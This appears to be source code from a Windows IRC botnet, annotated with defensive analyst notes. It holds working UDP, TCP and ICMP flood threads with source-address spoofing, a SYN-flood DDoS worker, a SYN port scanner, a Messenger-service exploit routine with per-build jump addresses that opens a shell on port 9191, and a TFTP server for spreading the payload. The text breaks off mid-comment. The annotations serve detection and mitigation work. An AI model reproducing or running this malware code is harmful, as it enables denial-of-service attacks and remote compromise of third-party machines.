// function for sending udp packets DWORD WINAPI udp(LPVOID param) { PINGFLOOD udp = *((PINGFLOOD *)param); PINGFLOOD *udps = (PINGFLOOD *)param; udps->gotinfo = TRUE; char sendbuf[IRCLINE], pbuff[MAXPINGSIZE]; int i; srand(GetTickCount()); SOCKET usock = fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; IN_ADDR iaddr; iaddr.s_addr = finet_addr(udp.host); LPHOSTENT hostent = NULL; if (iaddr.s_addr == INADDR_NONE) hostent = fgethostbyname(udp.host); if (hostent == NULL && iaddr.s_addr == INADDR_NONE) { sprintf(sendbuf,"[UDP]: Error sending pings to %s.", udp.host); if (!udp.silent) irc_privmsg(udp.sock, udp.chan, sendbuf, udp.notice); addlog(sendbuf); clearthread(udp.threadnum); ExitThread(1); } ssin.sin_addr = ((hostent != NULL)?(*((LPIN_ADDR)*hostent->h_addr_list)):(iaddr)); ssin.sin_port = ((udp.port == 0)?(fhtons((unsigned short)((rand() % MAXPINGSIZE) + 1))):(fhtons((unsigned short)udp.port))); if (udp.port < 1) udp.port = 1; if (udp.port > MAXUDPPORT) udp.port = MAXUDPPORT; udp.num = udp.num / 10; if (udp.delay == 0) udp.delay = 1; for (i = 0; i < udp.size; i++) pbuff[i] = (char)(rand() % 255); while (udp.num-- > 0) { //change port every 10 packets (if one isn't specified) for (i = 0; i < 11; i++) { fsendto(usock, pbuff, udp.size-(rand() % 10), 0, (LPSOCKADDR)&ssin, sizeof(ssin)); Sleep(udp.delay); } if (udp.port == 0) ssin.sin_port = fhtons((unsigned short)((rand() % MAXPINGSIZE) + 1)); } sprintf(sendbuf,"[UDP]: Finished sending packets to %s.", udp.host); if (!udp.silent) irc_privmsg(udp.sock, udp.chan, sendbuf, udp.notice); addlog(sendbuf); clearthread(udp.threadnum); ExitThread(0); }
// Propagation routine aimed at a remote service over UDP (judging by the name,
// the Windows Messenger service -- the packet contents come from
// PreparePacket(), which is not shown here).
//
// exinfo carries the target address (exinfo.ip), port (exinfo.port) and the
// index of this routine in the exploit[] statistics table (exinfo.exploit).
// Returns TRUE only when ConnectShellEx() reports success afterwards.
//
// Analyst notes (defensive):
//  - Sequence on the wire: an RPC fingerprint of the target (FpHost with
//    FP_RPC), one UDP datagram to exinfo.port, a 500 ms pause, then a follow-up
//    through ConnectShellEx(exinfo, 9191). The 9191 argument is presumably a
//    TCP port the payload listens on -- confirm in ConnectShellEx. Inbound UDP
//    to the service followed by a connection to that port is the correlation
//    to alert on.
//  - The two table entries hold fixed addresses for specific OS/service-pack/
//    language builds, so the routine depends on an unpatched target of exactly
//    those builds; patching or disabling the service and filtering its ports
//    at the perimeter remove the exposure.
BOOL MessengerService(EXINFO exinfo)
{
    int sockUDP,ver,packetsz;
    unsigned char packet[8192];
    struct sockaddr_in targetUDP;

    // Per-build constants handed to PreparePacket().
    struct {
        char os[30];
        DWORD SEH;
        DWORD JMP;
    } targetOS[] = {
        {
            "Windows 2000 SP 3 (en)",
            0x77ee044c, // unhandledexceptionfilter pointer
            0x768d693e  // cryptsvc.dll call [esi+48] 0x768d693e
        },
        {
            "Windows XP SP 1 (en)",
            0x77ed73b4,
            0x7804bf52  //rpcrt4.dll call [edi+6c]
        }
    };

    // Targets identified as NT4, or not identified at all, are skipped.
    int TargetOS = FpHost(exinfo.ip, FP_RPC);
    if ((TargetOS == OS_WINNT) || (TargetOS == OS_UNKNOWN))
        return FALSE;
    // NOTE(review): ver is assigned only for OS_WIN2K and OS_WINXP; any other
    // FpHost() result leaves it uninitialized when targetOS[] is indexed below.
    if (TargetOS == OS_WIN2K)
        ver = 0;
    if (TargetOS == OS_WINXP)
        ver = 1;

    ZeroMemory(&targetUDP, sizeof(targetUDP));
    targetUDP.sin_family = AF_INET;
    targetUDP.sin_addr.s_addr = finet_addr(exinfo.ip);
    targetUDP.sin_port = fhtons(exinfo.port);

    packetsz = PreparePacket((char*)packet,sizeof(packet),targetOS[ver].JMP,targetOS[ver].SEH);

    if ((sockUDP = fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
        return FALSE;
    }
    // NOTE(review): the socket is not closed on this failure path.
    if (fsendto(sockUDP, (char*)packet, packetsz, 0, (struct sockaddr *)&targetUDP, sizeof(targetUDP)) == -1) {
        return FALSE;
    }
    fclosesocket(sockUDP);

    Sleep(500);
    if (ConnectShellEx(exinfo, 9191) == true) {
        // Per-routine success counter kept in the exploit[] table.
        exploit[exinfo.exploit].stats++;
        return TRUE;
    }
    return FALSE;
}
// Thread entry point for the bot's raw-socket TCP flood command (status prefix
// "[TCP]"). Runs for tcpflood.time seconds, then reports a packet count.
//
// param points to a TCPFLOOD supplied by the caller; it is copied by value and
// gotinfo is set on the caller's copy (apparently a hand-off signal -- confirm
// against the spawner). Every path ends in ExitThread(0).
//
// Analyst notes (defensive):
//  - The IPv4 and TCP headers are built by hand on a SOCK_RAW socket with
//    IP_HDRINCL. Several fields are constant across every packet and usable as
//    a network signature: ident 1, TTL 128, sequence number 0x12345678,
//    window 512, source port in 0..1024, no options.
//  - With tcpflood.spoof set the source address is random per packet; egress
//    filtering of non-local source addresses (BCP 38) at the infected host's
//    network drops that traffic before it leaves.
//  - Each sendto() pushes all 60 bytes of szSendBuf although total_len
//    declares only the two headers.
//  - Status goes to the IRC control channel unless tcpflood.silent is set, and
//    always to addlog(); the "[TCP]: ..." strings are content signatures.
DWORD WINAPI TcpFloodThread(LPVOID param)
{
    TCPFLOOD tcpflood = *((TCPFLOOD *)param);
    TCPFLOOD *tcpfloods = (TCPFLOOD *)param;
    tcpfloods->gotinfo = TRUE;

    char sendbuf[IRCLINE], szSendBuf[60]={0};

    IPHEADER ipHeader;
    TCPHEADER tcpHeader;
    PSDHEADER psdHeader;

    srand(GetTickCount());

    SOCKET ssock;
    if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
        sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
        if (!tcpflood.silent)
            irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
        addlog(sendbuf);
        clearthread(tcpflood.threadnum);
        ExitThread(0);
    }

    // IP_HDRINCL: the caller supplies the IP header, which is what allows the
    // source address to be chosen freely below.
    BOOL flag = TRUE;
    if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
        sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
        if (!tcpflood.silent)
            irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
        addlog(sendbuf);
        clearthread(tcpflood.threadnum);
        ExitThread(0);
    }

    // Only dotted-quad targets are accepted; there is no DNS lookup here.
    // NOTE(review): ssock is left open on the two early-exit paths that follow
    // socket creation.
    if (finet_addr(tcpflood.ip) == INADDR_NONE) {
        sprintf(sendbuf,"[TCP]: Invalid target IP.");
        if (!tcpflood.silent)
            irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
        addlog(sendbuf);
        clearthread(tcpflood.threadnum);
        ExitThread(0);
    }

    SOCKADDR_IN ssin;
    memset(&ssin, 0, sizeof(ssin));
    ssin.sin_family=AF_INET;
    ssin.sin_port=fhtons(0);
    ssin.sin_addr.s_addr=finet_addr(tcpflood.ip);

    int sent = 0;
    unsigned long start = GetTickCount();

    // Time-bounded loop: whole seconds elapsed compared with tcpflood.time.
    while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) {
        ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
        ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
        ipHeader.ident=1;
        ipHeader.frag_and_flags=0;
        ipHeader.ttl=128;
        ipHeader.proto=IPPROTO_TCP;
        ipHeader.checksum=0;
        // Random source when spoofing, otherwise the address GetIP() returns
        // for the control socket.
        ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock))));
        ipHeader.destIP=ssin.sin_addr.s_addr;

        // Destination port 0 from the operator means a random port in 0..1024.
        ((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons(tcpflood.port)));
        tcpHeader.sport=fhtons((unsigned short)(rand()%1025));
        tcpHeader.seq=fhtonl(0x12345678);

        // Substring match on the type string. NOTE(review): if none of the
        // three matches, flags and ack_seq keep whatever they held before.
        if (strstr(tcpflood.type,"syn")) {
            tcpHeader.ack_seq=0;
            tcpHeader.flags=SYN;
        } else if (strstr(tcpflood.type,"ack")) {
            tcpHeader.ack_seq=0;
            tcpHeader.flags=ACK;
        } else if (strstr(tcpflood.type,"random")) {
            tcpHeader.ack_seq=rand()%3;
            ((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK));
        }

        tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
        tcpHeader.window=fhtons(512);
        tcpHeader.urg_ptr=0;
        tcpHeader.checksum=0;

        // TCP checksum is computed over pseudo-header + TCP header, staged in
        // szSendBuf.
        psdHeader.saddr=ipHeader.sourceIP;
        psdHeader.daddr=ipHeader.destIP;
        psdHeader.zero=0;
        psdHeader.proto=IPPROTO_TCP;
        psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader)));

        memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
        memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
        tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));

        // The same buffer is then overwritten with the real packet (IP header +
        // TCP header). The IP checksum is computed over both headers as laid
        // out, and the IP header is copied in again with the result.
        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
        memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
        memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
        ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
        if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
            fclosesocket(ssock);

            _snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError());
            if (!tcpflood.silent)
                irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
            addlog(sendbuf);
            clearthread(tcpflood.threadnum);
            ExitThread(0);
        }
        sent++;
    }
    fclosesocket(ssock);

    // NOTE(review): the rate divides by tcpflood.time, which is not checked for
    // zero in this function.
    sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
    if (!tcpflood.silent)
        irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
    addlog(sendbuf);
    clearthread(tcpflood.threadnum);
    ExitThread(0);
}
// Half-open ("SYN") probe of a single TCP port: sends one hand-built SYN
// segment on a raw socket and inspects the first reply addressed to the probe's
// source port.
//
// src_ip / dest_ip are used as given in the pseudo-header and the destination
// sockaddr (so presumably network byte order -- confirm at the call site).
// port is the TCP port to probe. delay is not used in this function.
// Returns TRUE when the reply has the SYN bit set, FALSE otherwise or on any
// socket error.
//
// Analyst notes (defensive):
//  - The probe is recognisable on the wire: fixed source port 9801, window 512,
//    data offset 5 (no TCP options), no follow-up ACK.
//  - The socket is SOCK_RAW/IPPROTO_TCP without IP_HDRINCL, so only the TCP
//    header is supplied here and no source address is forged by this function.
//  - Outcomes are written with addlog() ("Socket open." / "Socket closed.").
BOOL SynPortOpen(unsigned long src_ip, unsigned long dest_ip, unsigned int port, unsigned int delay)
{
    char buffer[LOGLINE];
    int size;

    unsigned short src_port = 9801;

    // TCP header with only the SYN flag set.
    TCPHEADER2 send_tcp;
    send_tcp.source = fhtons(src_port);
    send_tcp.dest = fhtons((unsigned short)port);
    send_tcp.seq = rand();
    send_tcp.ack_seq = 0;
    send_tcp.res1 = 0;
    send_tcp.res2 = 0;
    send_tcp.doff = 5;
    send_tcp.fin = 0;
    send_tcp.syn = 1;
    send_tcp.rst = 0;
    send_tcp.psh = 0;
    send_tcp.ack = 0;
    send_tcp.urg = 0;
    send_tcp.window = fhtons(512);
    send_tcp.check = 0;
    send_tcp.urg_ptr = 0;

    // Pseudo-header for the TCP checksum; this PSDHEADER embeds a copy of the
    // TCP header in its tcp member.
    PSDHEADER psdheader;
    psdheader.saddr = src_ip;
    psdheader.daddr = dest_ip;
    psdheader.zero = 0;
    psdheader.proto = IPPROTO_TCP;
    psdheader.length = fhtons(sizeof(send_tcp));
    memcpy (&psdheader.tcp, &send_tcp, sizeof (send_tcp));
    send_tcp.check = checksum((unsigned short *)&psdheader, sizeof (psdheader));

    SOCKADDR_IN ssin;
    memset(&ssin,0,sizeof(ssin));
    ssin.sin_family = AF_INET;
    ssin.sin_port = fhtons((unsigned short)port);
    ssin.sin_addr.s_addr = dest_ip;
    int ssin_len = sizeof(ssin);

    SOCKET tcp_sock = fsocket(AF_INET, SOCK_RAW, IPPROTO_TCP);
    if (tcp_sock == INVALID_SOCKET) {
        addlog("socket open failed");
        return FALSE;
    }

    // 20 is the size of an option-less TCP header; anything else is a failure.
    if ((size = fsendto(tcp_sock,(const char *)&send_tcp,sizeof(send_tcp),0,(LPSOCKADDR)&ssin,ssin_len)) != 20) {
        sprintf(buffer,"sendto() socket failed. sent = %d <%d>.", size, fWSAGetLastError());
        addlog(buffer);
        fclosesocket(tcp_sock);
        return FALSE;
    }

    // Read raw TCP segments until one is addressed to the probe's source port.
    // NOTE(review): no receive timeout is set in this function, so the loop
    // blocks until such a segment arrives or recvfrom() fails. The comparison
    // is between the received dest field and the host-order src_port -- the
    // byte order of recv_tcp.tcp.dest is not visible here; confirm.
    RECVHEADER recv_tcp;
    memset (&recv_tcp,'\0',sizeof(recv_tcp));
    while (recv_tcp.tcp.dest != src_port) {
        if (frecvfrom(tcp_sock,(char *)&recv_tcp,sizeof(recv_tcp),0,(LPSOCKADDR)&ssin, &ssin_len) < 0) {
            addlog("recvfrom() socket failed");
            fclosesocket(tcp_sock);
            return FALSE;
        }
    }

    fclosesocket(tcp_sock);
    // A reply with SYN set (i.e. SYN/ACK) is taken to mean the port is open.
    if (recv_tcp.tcp.syn == 1) {
        addlog("Socket open.");
        return TRUE;
    } else {
        addlog("Socket closed.");
        return FALSE;
    }
}
// Thread entry point for the bot's raw-socket ICMP flood command (status
// prefix "[ICMP]"). Runs for icmpflood.time seconds, then reports a count.
//
// param points to an ICMPFLOOD supplied by the caller; it is copied by value
// and gotinfo is set on the caller's copy (apparently a hand-off signal --
// confirm against the spawner). Every path ends in ExitThread(0).
//
// Analyst notes (defensive):
//  - Packets are hand-built on SOCK_RAW with IP_HDRINCL. Constant fields usable
//    as a signature: IP ident 1, TTL 128, ICMP sequence 1, ICMP id in 1..240,
//    payload filled with one repeated byte.
//  - ICMP type and code are random per packet and both the IP and ICMP
//    checksum fields are left at 0 (checksum() is never called here), so the
//    ICMP messages do not validate at the receiver; the cost to the target is
//    bandwidth and per-packet processing rather than protocol handling.
//  - With icmpflood.spoof set the source address is random per packet; egress
//    filtering (BCP 38) on the infected host's network blocks that case.
//  - Unlike the TCP variant, nothing here is written with addlog(); status is
//    only sent through irc_privmsg() unless icmpflood.silent is set.
DWORD WINAPI ICMPFloodThread(LPVOID param)
{
    ICMPFLOOD icmpflood = *((ICMPFLOOD *)param);
    ICMPFLOOD *icmpfloods = (ICMPFLOOD *)param;
    icmpfloods->gotinfo = TRUE;

    // szSendBuf is only used for sizeof() in the final statistics line.
    char sendbuf[IRCLINE], szSendBuf[60]={0};

    // static: one packet buffer shared by every thread running this function.
    static ECHOREQUEST echo_req;

    SOCKET ssock;
    if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
        sprintf(sendbuf,"[ICMP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
        if (!icmpflood.silent)
            irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
        clearthread(icmpflood.threadnum);
        ExitThread(0);
    }

    // IP_HDRINCL: the caller supplies the IP header, including the source.
    BOOL flag = TRUE;
    if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
        sprintf(sendbuf,"[ICMP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
        if (!icmpflood.silent)
            irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
        clearthread(icmpflood.threadnum);
        ExitThread(0);
    }

    // Only dotted-quad targets are accepted; there is no DNS lookup here.
    if (finet_addr(icmpflood.ip) == INADDR_NONE) {
        sprintf(sendbuf,"[ICMP]: Invalid target IP.");
        if (!icmpflood.silent)
            irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
        clearthread(icmpflood.threadnum);
        ExitThread(0);
    }

    SOCKADDR_IN ssin;
    memset(&ssin, 0, sizeof(ssin));
    ssin.sin_family=AF_INET;
    ssin.sin_port=fhtons(0);
    ssin.sin_addr.s_addr=finet_addr(icmpflood.ip);

    int sent = 0;
    unsigned long start = GetTickCount();

    // Time-bounded loop: whole seconds elapsed compared with icmpflood.time.
    while (((GetTickCount() - start) / 1000) <= (unsigned long)icmpflood.time) {
        echo_req.ipHeader.verlen=(4<<4 | sizeof(IPHEADER)/sizeof(unsigned long));
        echo_req.ipHeader.total_len=fhtons(sizeof(ECHOREQUEST));
        echo_req.ipHeader.ident=1;
        echo_req.ipHeader.frag_and_flags=0;
        echo_req.ipHeader.ttl=128;
        echo_req.ipHeader.proto=IPPROTO_ICMP;
        echo_req.ipHeader.checksum=0;
        // Random source when spoofing, otherwise the address GetIP() returns
        // for the control socket.
        echo_req.ipHeader.sourceIP=((icmpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(icmpflood.sock))));
        echo_req.ipHeader.destIP=ssin.sin_addr.s_addr;

        echo_req.icmpHeader.type = rand()%256;
        echo_req.icmpHeader.subcode = rand()%256;
        echo_req.icmpHeader.id = (rand() % 240) + 1;
        echo_req.icmpHeader.checksum = 0;
        echo_req.icmpHeader.seq = 1;

        //fill the packet data with a random character..
        memset(echo_req.cData, rand()%255, sizeof(echo_req.cData));

        if (fsendto(ssock, (const char *) &echo_req, sizeof(ECHOREQUEST), 0, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN)) == SOCKET_ERROR) {
            fclosesocket(ssock);

            _snprintf(sendbuf,sizeof(sendbuf),"[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", icmpflood.ip, sent, fWSAGetLastError());
            if (!icmpflood.silent)
                irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice);
            clearthread(icmpflood.threadnum);
            ExitThread(0);
        }
        sent++;
    }
    fclosesocket(ssock);

    // NOTE(review): the byte figures use sizeof(szSendBuf) (60) rather than
    // sizeof(ECHOREQUEST), and the rate divides by icmpflood.time without a
    // zero check.
    sprintf(sendbuf,"[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", icmpflood.type, icmpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / icmpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
    if (!icmpflood.silent)
        irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice);
    clearthread(icmpflood.threadnum);
    ExitThread(0);
}
// Thread entry point for the bot's built-in single-file TFTP server (status
// prefix "[TFTP]"). It answers read requests for tftp.requestname in "octet"
// mode with the contents of tftp.filename and rejects everything else.
//
// param points to a TFTP struct supplied by the caller; it is copied by value
// and gotinfo is set on the caller's copy. The loop keeps running while the
// caller's gotinfo stays set, so clearing it appears to be the stop signal.
//
// Analyst notes (defensive):
//  - Host indicator: a UDP listener on tftp.port bound to INADDR_ANY in a
//    process that has no business serving files.
//  - Network indicators: the two fixed error replies below -- TFTP ERROR code 1
//    with text "File Not Found" and ERROR code 4 with text "kthx". The second
//    is distinctive enough to use as an IDS content match.
//  - Each started and completed transfer is announced on the control channel
//    (unless tftp.silent) and logged with the peer address.
//  - Robustness defects an analyst should know about when emulating or
//    sandboxing this code are marked NOTE(review) inline.
DWORD WINAPI tftpserver(LPVOID param)
{
    FILE *fp;

    char sendbuf[IRCLINE], buffer[128], type[]="octet", IP[18];

    int err=1;

    TFTP tftp = *((TFTP *)param);
    TFTP *tftps = (TFTP *)param;
    tftps->gotinfo = TRUE;
    tftp.threads++;

    SOCKET ssock;
    if ((ssock=fsocket(AF_INET,SOCK_DGRAM,0)) == INVALID_SOCKET) {
        Sleep(400);
        sprintf(sendbuf,"[TFTP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
        if (!tftp.silent)
            irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
        addlog(sendbuf);
        clearthread(tftp.threadnum);
        ExitThread(0);
    }
    // Record the socket in the global thread table (presumably so another
    // thread can close it -- confirm where threads[].sock is read).
    threads[tftp.threadnum].sock=ssock;

    SOCKADDR_IN ssin;
    memset(&ssin, 0, sizeof(ssin));
    ssin.sin_family = AF_INET;
    ssin.sin_port = fhtons((unsigned short)tftp.port);
    ssin.sin_addr.s_addr = INADDR_ANY;

    // NOTE(review): on bind failure the function waits 5 s and calls itself
    // again without closing ssock; repeated failures grow the stack and leak
    // one socket per attempt.
    if((fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) {
        Sleep(5000);
        tftp.threads--;
        return tftpserver(param);
    }

    // This failure is reported to the channel even when tftp.silent is set.
    if ((fp=fopen(tftp.filename, "rb")) == NULL) {
        Sleep(400);
        sprintf(sendbuf,"[TFTP]: Failed to open file: %s.",tftp.filename);
        irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
        addlog(sendbuf);
        clearthread(tftp.threadnum);
        ExitThread(0);
    }

    // Serve until a read returns 0 bytes / recvfrom fails (err <= 0) or the
    // caller clears gotinfo.
    while(err>0 && tftps->gotinfo && fp) {
        TIMEVAL timeout;
        timeout.tv_sec=5;
        timeout.tv_usec=5000;
        fd_set fd;
        FD_ZERO(&fd);
        FD_SET(ssock,&fd);

        memset(buffer,0,sizeof(buffer));
        if(fselect(0,&fd,NULL,NULL,&timeout) > 0) {
            SOCKADDR_IN csin;
            int csin_len=sizeof(csin);
            char f_buffer[BLOCKSIZE+4]="";

            err=frecvfrom(ssock, buffer, sizeof(buffer), 0, (LPSOCKADDR)&csin, &csin_len);
            // NOTE(review): the address string is passed as the format
            // argument; it holds only digits and dots in practice, but "%s"
            // with the string as an argument is the safe form.
            sprintf(IP,finet_ntoa(csin.sin_addr));

            // parse buffer
            if(buffer[0]==0 && buffer[1]==1) { //RRQ
                char *tmprequest=buffer,*tmptype=buffer;
                tmprequest+=2; //skip the opcode
                // NOTE(review): the offset of the mode string is derived from
                // the configured request name, not from the received packet,
                // and is not checked against sizeof(buffer).
                tmptype+=(strlen(tftp.requestname)+3); //skip the opcode and request name + NULL
                if(strncmp(tftp.requestname,tmprequest,strlen(tftp.requestname)) != 0||strncmp(type,tmptype,strlen(type)) != 0) {
                    // TFTP ERROR, code 1, message "File Not Found".
                    fsendto(ssock, "\x00\x05\x00\x01\x46\x69\x6C\x65\x20\x4E\x6F\x74\x20\x46\x6F\x75\x6E\x64\x00", 19, 0, (LPSOCKADDR)&csin,csin_len);
                    // for loop to add a \0 to the end of the requestname
                    // NOTE(review): unbounded sprintf into the 128-byte receive
                    // buffer; the logged name is the configured one, not the
                    // name the peer asked for.
                    sprintf(buffer,"[TFTP]: File not found: %s (%s).",IP,tftp.requestname);
                    addlog(buffer);
                } else { // good rrq packet send first data packet
                    fseek(fp, 0, SEEK_SET);
                    f_buffer[0]=0; f_buffer[1]=3; // DATA
                    f_buffer[2]=0; f_buffer[3]=1; // DATA BLOCK #
                    err=fread(&f_buffer[4], 1, BLOCKSIZE, fp);
                    fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);
                    sprintf(sendbuf,"[TFTP]: File transfer started to IP: %s (%s).",IP,tftp.filename);
                    if (!tftp.silent)
                        irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
                    addlog(sendbuf);
                }
            } else if(buffer[0]==0 && buffer[1]==4) { // ACK
                // send next packet
                // The server keeps no per-client state: the next block is
                // derived purely from the block number in the peer's ACK.
                unsigned int blocks;
                BYTE b1=buffer[2],b2=buffer[3]; // ACK BLOCK #

                f_buffer[0]=0; f_buffer[1]=3; // DATA
                if (b2==255) { // DATA BLOCK #
                    f_buffer[2]=++b1;
                    f_buffer[3]=b2=0;
                } else {
                    f_buffer[2]=b1;
                    f_buffer[3]=++b2;
                }
                blocks=(b1 * 256) + b2 - 1; // remember to subtract 1 as the ACK block # is 1 more than the actual file block #
                fseek(fp, blocks * BLOCKSIZE, SEEK_SET);
                err=fread(&f_buffer[4], 1, BLOCKSIZE, fp);
                fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);
                // A zero-byte read means the file has been sent in full; this
                // also ends the serving loop (err > 0 fails).
                if (err==0) {
                    sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s (%s).",IP,tftp.filename);
                    if (!tftp.silent)
                        irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
                    addlog(sendbuf);
                }
            } else { // we dont support any other commands
                // TFTP ERROR, code 4, message "kthx".
                fsendto(ssock, "\x00\x05\x00\x04\x6B\x74\x68\x78\x00",9, 0, (LPSOCKADDR)&csin, csin_len);
            }
        } else
            continue;
    }
    // check for ack, then msg irc on transfer complete

    fclosesocket(ssock);
    fclose(fp);

    tftp.threads--;
    if(tftps->gotinfo == FALSE) {
        clearthread(tftp.threadnum);
        ExitThread(0);
    }
    Sleep(1000);

    // Restart the listener by recursion after each completed transfer or
    // receive error. NOTE(review): the stack grows with every restart.
    return tftpserver(param);
}
// Raw-socket TCP flood worker: sends hand-built IPv4/TCP packets to
// TargetIP:TargetPort for len seconds and returns the number of bytes that
// sendto() reported.
//
// TargetIP is used as given in the IP header and sockaddr (presumably network
// byte order -- confirm at the call site). SpoofingIP is the first forged
// source address; it is converted with htonl and incremented once per packet.
// Type selects the TCP flags: "ddos.syn", "ddos.ack" or "ddos.random".
// Returns FALSE (0) if Winsock or socket setup fails and 0 on the first send
// error; otherwise the byte total.
//
// Analyst notes (defensive):
//  - Signature on the wire: source addresses that increase by one per packet,
//    source port in 1000..2000, window 16384, IP ident 1, TTL 128, no TCP
//    options, and a "sequence number" whose value is a 16-bit quantity.
//  - Every packet carries a forged source, so egress filtering (BCP 38) at the
//    infected host's network stops it; at the receiving end SYN cookies and
//    per-source rate limits are the usual mitigations for the SYN variant.
//  - Only send errors are logged ("[DDoS]: Send error: <n>."), via addlog().
long SendDDOS(unsigned long TargetIP, unsigned int SpoofingIP, char *Type, unsigned short TargetPort, int len)
{
    WSADATA WSAData;
    SOCKET sock;
    SOCKADDR_IN addr_in;
    IPHEADER ipHeader;
    TCPHEADER tcpHeader;
    PSDHEADER psdHeader;

    LARGE_INTEGER freq, halt_time, cur;
    char szSendBuf[60]={0},buf[64];
    int rect;

    if (fWSAStartup(MAKEWORD(2,2), &WSAData)!=0)
        return FALSE;

    if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED )) == INVALID_SOCKET) {
        fWSACleanup();
        return FALSE;
    }

    // IP_HDRINCL: the caller supplies the IP header, including the source.
    BOOL flag=TRUE;
    if (fsetsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
        fclosesocket(sock);
        fWSACleanup();
        return FALSE;
    }

    // NOTE(review): addr_in is not zeroed before use here.
    addr_in.sin_family=AF_INET;
    addr_in.sin_port=fhtons((unsigned short)TargetPort);
    addr_in.sin_addr.s_addr=TargetIP;

    ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
    ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
    ipHeader.ident=1;
    ipHeader.frag_and_flags=0;
    ipHeader.ttl=128;
    ipHeader.proto=IPPROTO_TCP;
    ipHeader.checksum=0;
    ipHeader.destIP=TargetIP;

    // sport and seq set here are overwritten on every loop iteration below.
    tcpHeader.dport=fhtons((unsigned short)TargetPort);
    tcpHeader.sport=fhtons((unsigned short)rand()%1025);
    tcpHeader.seq=fhtonl(0x12345678);

    /* A SYN attack simply floods its target with TCP SYN packets.
       Each SYN packet needs a SYN-ACK response and forces the server to wait
       for the matching ACK in reply. The ACK is never sent: because the source
       address is forged there is no chance of an ACK returning. The server
       keeps sending SYN-ACKs while waiting for ACKs, and once its queue of
       half-open connections is full it can no longer accept incoming SYNs
       until the attack is cleared up. SYN cookies remove the per-SYN state
       that this depends on. */
    // NOTE(review): exact string match; if Type is none of the three values,
